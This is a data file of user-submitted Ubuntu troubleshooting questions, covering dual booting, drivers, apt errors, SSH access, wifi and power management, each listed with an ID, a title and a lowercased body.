393235	ubuntu on vmware ( os x ) does n't suspend when inactive	i 'm running 13.10 as a virtual machine under vmware fusion 6.0.2 on os x 10.8.5 , and also have a windows 7 vm . my computer is a bit flaky , unfortunately , and occasionally it freezes to the point that i need to do a hard power cycle by pressing the power button until the machine resets . os x actually recovers surprisingly well from this sort of treatment , unfortunately any vms that are running do not , even if they are using journalling file systems . it 's kind of a pain , but to get around this i 've set up the power management options in win7 and ubuntu to shut the vm down after some idle time - 3 or 4 hours in the case of windows , and 1 hour for ubuntu . windows works fine - if i leave the vm running without interacting with it , it suspends itself and so is protected from any power issues . unfortunately , i ca n't get the same behavior with ubuntu . i 've gone to system settings - > power and set suspend when inactive for 1 hour . after an hour of idle time , the following menu appears : but the vm does n't actually shut down . what 's even stranger is that if i interact with the dialog box in any possible way , nothing happens - i can hit ok , cancel , or close it using the x , and it just disappears - there 's no effect on the system . if i leave the box alone for hours , nothing happens . if i close it then leave the system alone , it reappears , but still has no functionality . i have to manually choose suspend , restart ... , or shut down ... from the top menu bar in unity to actually suspend , restart , or shut down the vm . i have a pretty vanilla system - it 's a new installation of 13.10 x64 , not even upgraded from a previous version , and i have n't done any messing around with the system ( yet ) , although if that 's what 's needed i 'm certainly willing and able to . is this a known issue , and if so are there any workarounds ? any help or suggestions will be much appreciated .
393236	i auto logon 12.04 and auto start x11vnc - system locks up . can i disable auto logon at boot or disable auto start ?	i auto-login to ubuntu 12.04 and auto-start x11vnc . however , the system locks up right after boot - i presume that x11vnc 's auto-start is the culprit . can i disable auto-login at boot or disable auto-start for x11vnc ? telnet dies during the failed boot so it is not available to help . thanks in advance .
393238	how can i make a fresh install of ubuntu ?	i want to remove windows 7 from my toshiba satellite and do a fresh install of ubuntu on it . how can i get that done ?
393240	i ca n't login after install fglrx 13.10	i installed fglrx following the instructions on help.ubuntu.com and am entirely unable to login , i get the login screen , enter my password and get a blinking terminal screen then logged out/sent back to the login screen . i have tried some of the tips in the forums for how to fix it and it wo n't work . i can login via terminal , but get no desktop , have tried restarting lightdm and whatnot , still does n't work . any help is appreciated
393244	video on lubuntu 13.10 sony vaio pro 13 lags	i have dual-boot win8 and lubuntu 13.10 on sony vaio pro 13 ( intel core i5 4200 haswell , intel hd graphics 4400 ) . everything works great , even dota 2 runs on linux with sufficient fps . the problem is video - i ca n't watch high bitrate anime because it lags . i use vlc as player , i had to set the video output to opengl just to see anything at all . i 've tried downloading lubuntu-restricted-extras ( which i 've read somewhere could help with graphics driver ) . the laptop can play the files on win8 , so it 's not a performance issue , but i ca n't find out what is wrong or how to fix it . so what am i doing wrong ? or what kind of information is needed to solve this ?
393246	alternate for hibernation in ubuntu 13.1	i have newly installed ubuntu 13.1 on my sony viao laptop and would very much like to have a sleep/hibernate functionality on my laptop ( when i close the lid of my laptop ) . the following link told me how to enable hibernation , except that it seems like my laptop does n't like hibernation . how to enable hibernation ? when i try to put my laptop to hibernate and bring it back to life , it simply hangs and does nothing . would someone please be able to help me out with this ? step -- by-step instructions would be greatly appreciated as i am very new to the world of linux . cheers
393256	dual boot with two discs , slave , primary ... ?	i have two discs , ata and sata , in the sata i have windows 7 , i 'd like to install ubuntu 12.04.3 in the ata . how can i do it ? two need to be primary ? one slave ? i 'd like grub could do a dual boot 'cause i need windows too . thanks .
393257	apt update error `` something wicked happened '' ( -11 - system error )	i 'm getting this error when i run apt-get update . i 'm on kubuntu 13.04 . w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //download.virtualbox.org/virtualbox/debian/dists/raring/release.gpg something wicked happened resolving 'download.virtualbox.org : http ' ( -11 - system error ) w : failed to fetch http : //ppa.launchpad.net/adilson/experimental/ubuntu/dists/raring/release.gpg something wicked happened resolving 'ppa.launchpad.net : http ' ( -11 - system error ) w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/raring-getdeb/release.gpg something wicked happened resolving 'archive.getdeb.net : http ' ( -11 - system error ) e : some index files failed to download . they have been ignored , or old ones used instead . i 've read other answers on here , and i do n't think this is a dns issue , as i copied some of the gpg links , like http : //download.virtualbox.org/virtualbox/debian/dists/raring/release.gpg , into firefox and it resolves properly . it finds and loads the file as it should in firefox . also , it does n't seem to be the same four files every time . i 've seen the steam , dropbox , chrome , and virtualbox repos all error out at various times . it 's always only four repos , and it 's different every time . none of them have any problem loading in firefox , and the fact that they resolve sometimes but not others makes me wonder how it could be dns related . but at the same time , this started happening around the time we upgraded to at & t u-verse . i 'm just confused . i do n't want to go messing with dns settings , but at the same time i need apt to update everything . ( update ) i decided to disable all third-party repos to see if that helps . with all of them disabled , there were no errors . i enabled virtualbox , no error . i added wine , no error . i added steam , one error . i added chrome , three errors . i disabled chrome , and it 's back to one error . it seems like the more third-party sources i add , the more errors i get . and it 's not the newly enabled sources that are erroring out . when i enabled steam , it was the virtualbox repo that threw the error . when i enabled chrome , it was two ubuntu.com and the steam repos that threw errors . then when i disabled chrome , it was the virtualbox repo that errored again . i tried once more and steam threw the error . i do n't know if there was an update to apt around the time this all started happening , but i seem to be having a problem where i can only have two third-party sources on at one time without causing errors .
393259	when i restart i do n't see grub and go straight to windows	i have installed ubuntu alongside windows xp , but can not get to my ubuntu operating system ... and go straight to windows every time . i have tried to reinstal ubuntu , but the dvd does n't recognise any operating system on my hard drive . i then ran `` try ubuntu '' ... and did a boot repair . this is the result : http : //paste.ubuntu.com/6602565/ here is what came out of fdisk ubuntu @ ubuntu : ~ $ sudo fdisk -l omitting empty partition ( 5 ) disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x41ab2316 device boot start end blocks id system /dev/sda1 63 176714 88326 de dell utility /dev/sda2 * 176715 147990779 73907032+ 7 hpfs/ntfs/exfat /dev/sda3 147990780 305652689 78830955 f w95 ext 'd ( lba ) /dev/sda4 300415563 305652689 2618563+ dd unknown /dev/sda5 147990906 294118019 73063557 83 linux /dev/sda6 294118083 300415499 3148708+ 82 linux swap / solaris
393261	internet connection and external access with two nics 12.04	i have just set up two nics in my ubuntu 12.04 server . i have eth0 and eth1 both configured to use dhcp . eth0 is connected to my router and the router has access to the internet . eth1 is connected directly to the internet ( i set it up because i am going on vacation and my router goes down sometimes , and i still need access to the server ) when i bring up eth1 with ifup , my local internet connection on the server is lost , and i can not connect to it externall from my routers address.aalthough i can connect to it through the other address pointing at eth1 . any idea how to allow access to the internet from the server , ( ping google.com ) while still allowing external access to the server from both addresses ? ( router address/other address )
393262	are all three grub entries after running boot-repair needed ?	after running boot-repair to fix things when dual booting windows 8 and ubuntu 12.04.3 , multiple entries are left in the grub menu . three come from menuentry `` windows uefi bkpbootmgfw.efi '' { search -- fs-uuid -- no-floppy -- set=root 4659-4959 chainloader ( $ { root } ) /efi/microsoft/boot/bkpbootmgfw.efi } menuentry `` windows boot uefi loader '' -- users `` '' { search -- fs-uuid -- no-floppy -- set=root 4659-4959 chainloader ( $ { root } ) /efi/boot/bkpbootx64.efi } menuentry `` efi/lenovo/boot/bootmgfw.efi '' { search -- fs-uuid -- no-floppy -- set=root 4659-4959 chainloader ( $ { root } ) /efi/lenovo/boot/bootmgfw.efi } the second is recommended in the boot-repair documentation as the one to use to boot windows 8 , but equally it seems the first option does the job fine too , and the last give access to settings . do i really need all these , or can i simply comment them out in 25_custom ? similarly , given that the original boot entry for windows in 30_os-prober is defunct , can i just comment it out ? what is the difference between each of these efi boot loaders anyway ?
393267	going to > applications > accessories > terminal	if i take the steps as in the title , i end up in a window called : - x @ x-not-specified : ~ what can i do with this application ? what is it used for ? how can i learn about it ?
393268	how do i get a list of connected ip 's without having root access ?	i 've become a target from a hacker that i have encountered in a video game . i have become a target of relentless attacks from multiple directions . as a countermeasure , i 've installed ufw and have ran a few policies . i do n't want to cut the internet connection of for any or all of my programs by setting a script like ... ..default reject . what i want to do is gain access to a list of ip 's that are suspect and block it individually . the main issue i have is giving myself root access as i do n't want them to alter my computer or any of the information i have on it . please help me . sincerely exhausted hacker target
393270	it seems to be a conflict between indicator-multiload and indicator-sound-gtk2	after upgrading from 12.04 to 13.10 , indicator-multiload indicators in the xfce4 panel become invisible as soon as i activate indicator-sound-gtk2 . i do n't know where i can find any error log for this , sorry . does anyone have the same issue ? best , tin
393271	eclipse throwing 'editor does not contain a main type ' error when running java program	so i am trying to learn java , but for some reason when ever i try to run my program in eclipse i get this : as you can see , the program is very simple ( the first program i am supposed to write ) , so i do n't know what 's going on ! i have n't been able to find the log in the workspace/.metadata/.log folder as specified on the eclipse wiki and nothing appears when i launch eclipse from the terminal . if it matters at all i installed eclipse from the archive downloaded from http : //developer.android.com/sdk/index.html because i was originally going for learning how to make android apps ( then i figured i ought to learn java first . : d ) anyways , does anyone know what is causing this error and how to fix it ? thanks !
393273	select the default language and subtitles with dvdauthor	summary of the question : how can i select the default language and subtitles with dvdauthor ? i create backup copies of the dvds my kids are allowed to watch that only contain the main title . i use dvdbackup , dvdauthor and genisoimage tied together in a basic script under ubuntu 13.10 . it 's great ! the kids can just pop the copy in the dvd player and the movie starts immediately : no adverts , no previews , no menus , no fiddling , no ( more ) ruining the original discs . here are roughly the commands i use : dvdbackup -- title=x dvdauthor -t -o ~/dvd *.vob dvdauthor -o ~/dvd -t genisoimage -dvd-video -udf -o disc.iso ~/dvd i only have a problem with movies that have more than one language and where our preferred language is not already first on the original dvd . i just do n't know how to instruct dvdauthor to select a given audio track ( and possibly subtitles ) . what 's the best way to go about this ? i read in the manual for dvdauthor that instructions can be given , such as `` language=0-7 ; '' or `` subtitles=0-31|64-95 ; '' , which seems to be what i need . however , i do n't understand how or where to place them in my commands .
393278	ssh : permission denied , please try again . while tryng to connect to remote 12.04 server	i 'm having quite the head ache because of this . the day before yesterday i rented a vps at atlantic . they provided me with vnc and root 's ssh credentials . i could only login through a vnc viewer applet they 've in their control panel website . but whenever i tried to connect using ssh with the credential they provided for root user . i kept getting a horrible permission denied , please try again . ok , no problem , i kindda remembered something about root account being disabled in ubuntu ( although why i could log using root credentials using the host 's vnc , i prefered think about it as a universal mistery ) , so i logged using vnc , and changed root password . tried again to ssh it using my new password and ... success . that same night a colleague needed an ssh , so i created the user ( yes , through add user ) . he had the same faith . permission denied , please try again all over again . no problem , i logged through vnc using his account ( success ) and changed password . tried again to ssh using the new user 's password and ... success ! it was a good night . next day ( today ) i tried to ssh . no luck . server kept greeting me with permission denied , please try again . `` oh it 's that again '' . well , i tried the procedure that served so well yesterday . changing password . this time , with no luck . through the day i 've been able to follow a couple of troubleshooting guide from ask ubuntu . no luck . i just keep getting the same error . i 'm not very good using the command line so , i just do n't know how could i post my sshd_config while only connecting through a vnc applet ( ! ! ! ) , but i can tell you i did nothing to it but uncomment the lines listenaddress : : listenaddress 0.0.0.0 that 's it . having not tried being a sysadmin ever before , i 'm kindda lost here . i ca n't even explain myself why would it let me in one day , and the next day deny me access again . i may be losing something obvious , can someone help me ? update ok , so just because why not , i kept trying sshing and changing password . it happened again ! after a lot of tries , after i changed the password for nth time , it worked again . any ideas ? update 2 after a couple of minutes of having sshed , the terminal displayed `` write failed : broken pipe '' before showing my usual local shell prompt . is this any clue about what 's happening ?
393284	update manager is not working in ubuntu 13.10	my update manager is not working when i am trying to update the system . even if it opens it crashes . when i try to to run from terminal it shows an error message which is as follows : *dinse @ dinse-g41t-m7 : ~ $ update-manager synaptic ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:93:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:199:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:220:16 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:220:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:233:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:286:22 : not a valid image ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:290:22 : not a valid image ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:307:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:395:19 : 'fg_color ' is not a valid color name ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:536:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:587:19 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:951:19 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1017:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1027:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1027:22 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1055:14 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1730:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1747:21 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1763:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1809:16 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1809:18 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1809:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1812:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1825:16 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1825:18 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1825:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1830:23 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1839:23 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1853:11 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1925:14 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:27:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:106:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:131:4 : not a number ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:152:4 : not a number ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:171:4 : not a number ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:201:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:381:19 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:393:19 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:738:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:814:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:830:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:846:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : gnome-panel.css:92:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:14:18 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:14:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:118:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:123:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:148:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:154:20 : not using units is deprecated . assuming 'px ' . ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:159:21 : junk at end of value ( update-manager:2086 ) : gtk-warning ** : theme parsing error : nautilus.css:175:20 : not using units is deprecated . assuming 'px ' . traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 114 , in < module > app = updatemanager ( data_dir , options ) file `` /usr/lib/python3/dist-packages/updatemanager/updatemanager.py '' , line 113 , in __init__ self.options and self.options.use_proposed ) file `` /usr/lib/python3/dist-packages/updatemanager/metareleasegobject.py '' , line 44 , in __init__ metareleasecore.__init__ ( self , usedevelopmentrelease , useproposed ) file `` /usr/lib/python3/dist-packages/updatemanager/core/metarelease.py '' , line 90 , in __init__ self.flavor_name = get_ubuntu_flavor_name ( ) file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 447 , in get_ubuntu_flavor_name pkg = get_ubuntu_flavor_package ( cache=cache ) file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 437 , in get_ubuntu_flavor_package cache = apt.cache ( ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 154 , in open self._list.read_main_list ( ) systemerror : e : malformed line 52 in source list /etc/apt/sources.list ( dist parse ) *
393289	how to install libdb4.8++-dev or equivalent on 13.10 ?	i am trying to test a mod that i 've created of peercoin . i need to install libdb4.8++-dev , but it is not available . how can i install it or an equivalent ? note : this is not a dupe since i can not install a package of my custom alteration of peercoin .
393290	unmet dependencies/ broken packages	i am trying to install the necessary plug-ins to play a video but i always get the `` broken packages '' message . after searching on ask ubuntu i 've already performed the sudo apt-get autoclean and sudo apt-get update commands , but they wo n't work and when using sudo apt-get -f install , this is what i get : 1 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . 1 not fully installed or removed . need to get 0 b/67.9 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 179332 files and directories currently installed . ) preparing to replace libdjvulibre-text 3.5.24-9 ( using ... /libdjvulibre-text_3.5.24-9ubuntu0.1_amd64.deb ) ... unpacking replacement libdjvulibre-text ... dpkg : error processing /var/cache/apt/archives/libdjvulibre-text_3.5.24-9ubuntu0.1_amd64.deb ( -- unpack ) : unable to create `/usr/share/djvu/osi/en/messages.xml.dpkg-new ' ( while processing `./usr/share/djvu/osi/en/messages.xml ' ) : input/output error errors were encountered while processing : /var/cache/apt/archives/libdjvulibre-text_3.5.24-9ubuntu0.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help ?
393291	installing repo	i have installed repo and created the ~/bin etc . however , when i open the bin folder the repo is a gedit file , how do i make it so that the file is executable ?
393296	do i have to reinstall windows security software after installing ubuntu ?	i am completly new to ubuntu and a dual boot system . i have a toshiba laptop with an i7 processor , 64 bit system with windows 8 installed . i would like to install ubuntu as a dual boot and want to know if there is anything special i should do or watch for haveing windows8 installed . once ubuntu is installed will i have to reinstall security software that i installed in windows to protect my pc in ubuntu ?
393298	central management for managing multiple ubuntu desktops	i have used spacewalk before and am looking at foreman.. but not sure what will best meet my needs . the project i 'm looking at doing is what several people do around the world , i want to take in computers that are no longer being used ( donated computers preferable ) , install ubuntu on them and get with the different schools in the area to find out who needs them . i 'm a fairly experienced sys admin , so i have no trouble there . i 'm just looking for a system that i can run and manage any computer by updating software and making sure everything is good . as much functionality as possible would be great . i do plan on getting help from a few of my friends ... which are n't as experienced at sys admin duties . so a system that 's easy to understand and use is a must . thank you all in advance !
393300	changing adapter back to manged mode	i changed my adapter to monitor mode using : sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor now , i can not change it back ( in the gui , when i click on connections , it says that `` wireless is disabled by wireless switch '' ) . i have not switched off anything from hardware buttons . i tried sudo ifconfig wlan0 down sudo iwconfig wlan0 mode managed sudo service network-manager restart i also tried pccardctl eject pccardctl insert it appears that it has switched back to managed mode , but is still offline : ifconfig output : eth0 link encap : ethernet hwaddr 00:24:21:6f:84:69 inet addr:10.100.1.41 bcast:10.100.255.255 mask:255.255.0.0 inet6 addr : fe80 : :224:21ff : fe6f:8469/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:27668 errors:0 dropped:0 overruns:0 frame:0 tx packets:3504 errors:0 dropped:0 overruns:0 carrier:0 collisions:1 txqueuelen:1000 rx bytes:4493143 ( 4.4 mb ) tx bytes:659945 ( 659.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:553 errors:0 dropped:0 overruns:0 frame:0 tx packets:553 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:84110 ( 84.1 kb ) tx bytes:84110 ( 84.1 kb ) iwconfig output : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off
393303	is google chrome and chromium are different browser	i have ubuntu 12 in my pc . during installation of useful software , i was looking for browser except firefox ( which is by default browser ) . through ubuntu software manager , i got chromium and installed it . its looks like google chrome . is it the same as google chrome ? thanks ...
393305	`` enable wifi '' option gone	so my wifi was disabled ( i could n't select the `` enable wifi '' option ) and would n't automatically connect to wifi sometimes . i ran this command after reading that it did the trick for someone sudo modprobe -rv wl sudo apt-get remove -- purge bcmwl-kernel-source sudo modprobe -v brcmsmac but now the option is gone altogether and it still wo n't connect ! any suggestions ?
393310	combining sda and sdb	i recently purchased a laptop to install ubuntu onto . from my understanding , there is 1 ssd inside with a size of 256gb . however , upon attempting to install ubuntu , i am given two partitions , sda and sdb of equal size . if i install on sda will that limit my `` total '' size of ubuntu to 128 gb ? how do i combine the two to use a total size of 256 gb ? am i wrong in assuming that there is 1 ssd of size 256 ? thank you . @ falconer 's request /dev/sda : ata device , with non-removable media model number : sandisk sd6sp1m128g1002 serial number : 132254401865 firmware revision : x231202 media serial num : media manufacturer : transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : used : unknown ( minor revision code 0x0028 ) supported : 8 7 6 5 likely used : 8 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 250069680 lba48 user addressable sectors : 250069680 logical sector size : 512 bytes physical sector size : 512 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 122104 mbytes device size with m = 1000*1000 : 128035 mbytes ( 128 gb ) cache/buffer size = unknown nominal media rotation rate : solid state device capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 1 current = 1 advanced power management level : 128 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * download_microcode * advanced power management feature set set_max security extension * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * 64-bit world wide name * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * gen3 signaling speed ( 6.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * read_log_dma_ext equivalent to read_log_ext * dma setup auto-activate optimization device-initiated interface power management * software settings preservation * device sleep ( devslp ) * data set management trim supported ( limit 16 blocks ) * deterministic read zeros after trim security : master password revision code = 65534 supported not enabled not locked frozen not expired : security count supported : enhanced erase 2min for security erase unit . 12min for enhanced security erase unit . logical unit wwn device identifier : 5001b449d68f0149 naa : 5 ieee oui : 001b44 unique id : 9d68f0149 checksum : correct device sleep : devslp exit timeout ( deto ) : 20 ms ( drive ) minimum devslp assertion time ( mdat ) : 10 ms ( drive ) /dev/sdb : ata device , with non-removable media model number : sandisk sd6sp1m128g1002 serial number : 132254404902 firmware revision : x231202 media serial num : media manufacturer : transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : used : unknown ( minor revision code 0x0028 ) supported : 8 7 6 5 likely used : 8 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 250069680 lba48 user addressable sectors : 250069680 logical sector size : 512 bytes physical sector size : 512 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 122104 mbytes device size with m = 1000*1000 : 128035 mbytes ( 128 gb ) cache/buffer size = unknown nominal media rotation rate : solid state device capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 1 current = 1 advanced power management level : 128 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * download_microcode * advanced power management feature set set_max security extension * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * 64-bit world wide name * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * gen3 signaling speed ( 6.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * read_log_dma_ext equivalent to read_log_ext * dma setup auto-activate optimization device-initiated interface power management * software settings preservation * device sleep ( devslp ) * data set management trim supported ( limit 16 blocks ) * deterministic read zeros after trim security : master password revision code = 65534 supported not enabled not locked frozen not expired : security count supported : enhanced erase 2min for security erase unit . 12min for enhanced security erase unit . logical unit wwn device identifier : 5001b449d68f0d26 naa : 5 ieee oui : 001b44 unique id : 9d68f0d26 checksum : correct device sleep : devslp exit timeout ( deto ) : 20 ms ( drive ) minimum devslp assertion time ( mdat ) : 10 ms ( drive ) @ rpiawesomeness as you can see , /dev/sda is in the top right corner in the drop down menu , /dev/sdb can be accessed from there as well .
393311	bcd issue . so frustrating	blue screen : recovery your pc needs to be repaired the boot configuration data file is missing some required information file : \bcd error code : 0xc00000d this happened when i followed the instructions and installed ubuntu with wubi . after the first restart ! i really thought ubuntu means better , faster and error-free . my laptop , samsung 740u ultrabook os : windows 8 please help !
393312	is 1gb ddr2 ram sufficient for ubuntu 12.04 lts 32 bit desktop	i have amd processor with 1 gb ddr2 ram . i have installed ubuntu 12.04 lts desktop with 32 bit version . many times when i open 3-4 applications , it hanged and need to restart my pc . is it due to less ram or other hardware ?
393321	unable to delete user	i tried to delete a user : # deluser someuser removing user `someuser ' ... warning : group `someuser ' has no more members . userdel : user someuser is currently logged in /usr/sbin/deluser : `/usr/sbin/userdel someuser ' returned error code 8 . exiting . i ran who # who myuser pts/0 2013-12-19 23:00 ... it only shows me logged in . i really need to delete this user but i do n't have their password , i have sudo password however . how can i delete it ?
393322	ubuntu 13.10 + gtx 680 nvidia driver no funciona ( not work )	como estan ? tengo una pc desktop con un i7 3930k , un mother intel extreme dxto9 y una gtx680 de asus , probe instalar desde los ppa , desde los ejecutables de nvidia y desde el centro de software . no puedo ni loguearme una vez instalado , uno de los errores que en un caso pude ver porque me permitio ir a la tty1 fue pcie bus error severity=corrected type=physical layer . la pantalla queda negra siempre . muchas gracias hi , how are you ? i have a desktop pc with i7 3930k , mother intel extreme dxto9 y un gtx 680 from asus , i ca n't install nvidia driver , i try with ppa , executable from nvidia page and software center , i ca n't pass from logging , one error i xan seepcie bus error severity=corrected type=physical layer , always have black screen thanks
